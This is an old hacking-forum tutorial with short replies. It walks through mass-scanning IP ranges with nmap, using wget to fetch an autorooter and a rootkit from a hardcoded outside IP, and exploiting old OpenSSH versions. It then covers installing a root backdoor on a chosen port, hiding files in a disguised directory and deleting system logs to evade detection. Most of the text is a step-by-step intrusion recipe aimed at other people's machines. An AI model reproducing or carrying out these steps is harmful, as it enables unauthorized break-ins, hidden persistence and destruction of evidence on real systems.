SSH Scanning and Hacking
First, we need some tools
secureCRT (https://secure.vandyke.com/vandyke-bin/download_form.cgi?PRODUCT=SecureCRT_beta)
A SSH Client to connect to an SSH box.. With this
version u can SSH with a proxy

LNX r00tkit (http://81.86.153.92/dd/lnx.gz)
a rootkit, best there is i think.. Very easy to use..
Only needed in last step

X6 (http://81.86.153.92/dd/x6.tgz)
The Autorooter..

First, you gotta have a scan with vulernable ips (or just
one )
WATcH OUT FOR SSH-1.99 OPENSSH 2.1.1 !! VERY VULERNABLE
Almost always works for exploiting..

Lets say we got an IP, 0.0.0.0, and a shell..
Connect to your shell and type :
wget http://81.86.153.92/dd/x6.tgz
it downloads the autorooter to the shell..
When its done, Type : tar xzvf x6.tgz
Then type cd x6

When in the dir, type : ./x6 -t#
it shows u all the Exploitable SSH Versions.. Lets say we got an
exploitable SSH-1.99-OpenSSH-2.1.1 (target 123 on the list)
The Ip = 0.0.0.0
you type :
./x6 -t123 0.0.0.0

Now it says something like : ATTACH NOW..
Wait 6 Seconds then push Enter.. Normally it starts
exploiting, it says like
1. 0x0000000 . . [SEGV]
2. 0x00000c4 . . [SURVIVED]
Something like that..

Just let it go and it will exploit your box..

If it doesnt go to 1. ..., and it says FATAL: no
its not vulernable

Then, when it exploited the box, u get some thing like :
no crash been found
Rem from Remote : CHRIS CHRIS

*** YOU ARE IN ***
Boxname
Boxhost blahblah

then type the following
cd /usr/man/man3/
and then :
mkdir ". hiden"
and then :
cd "..."
This is an hidden dir so the Sysop wont notice

Now we r going to download the Rootkit
type :
wget http://81.86.153.92/dd/lnx.gz
It will start downloading..
When done, type : tar xzvf lnx.gz
and then:
cd lnx

Then, we r going to start it..
Lets say u want password "poop" on port 25374
then u type :
./own poop 25374

It Installs the Rootkit, and Done !! Connect to the ip
with port 25374 (or the one u too
Username = root
and u gave the password urself..

now CLEANIN (for no traces):

rm -rf /var/logs/*

SSH scan TUTORIAL
USE nmap

http://www.insecure.org/nmap/nmap_download.html


syntax

for SSH scanz

nmap -O -sS -p 20-23,80,443 '194.65.*.*' > FILE.OUTPUT


-O means guess remote OS
-sS tcp syn stealth
-p ports to scan (WE include ftp telnet and ssh and HTTP and secure http)
and finaly the nets '194.65.*.*' it will scan from 194.65.1.1
to 194.65.254.254

have PHUnz



ome Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use '-' for stdin
* -S /-e Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DE******IONS, AND EXAMPLES


Protecting your box to rehackers (IMPORTANT !!


Before scanin or haxin i would recomend to change thiz vars.

its very easy

works on all linux versions..


just make a shell ****** with vi ::

#!/bin/sh
####
echo Protectin ur Env to a safe hax W0rk
echo LOL.dDwAx
####
echo 1 > /proc/sys/net/ipv4/tcp_syn******s
echo 1 > /proc/sys/net/ipv4/conf/default/hidden
echo 1 > /proc/sys/net/ipv4/conf/default/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/default/forwarding
echo 1 > /proc/sys/net/ipv4/conf/default/log_martians
echo 1 > /proc/sys/net/ipv4/conf/default/rp_filter
echo 1 > /proc/sys/net/ipv4/conf/eth0/hidden
echo 1 > /proc/sys/net/ipv4/conf/eth0/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/eth0/forwarding
echo 1 > /proc/sys/net/ipv4/conf/eth0/log_martians
echo 1 > /proc/sys/net/ipv4/conf/eth0/rp_filter
####
echo Done
echo now use ur nmap or ur exploits and have phunz
####

i think someone might notice if all of the logs are gone.

Thx Teacher for this little tut, I'll maybe have a try on my local distro

Also saw this exact same thing word for word here:

http://members.lycos.nl/leersumfxp/For%20A...H%20Hacking.txt

Not all the links are active there either

oh, and if you root it (step back) there are many more.

http://members.lycos.nl/leersumfxp/For%20A%20Board/

Deleting all /var/log would be a bit stupid, i think Maybe only if you hope that the admin is blind

Do u still find such old sshd versions ?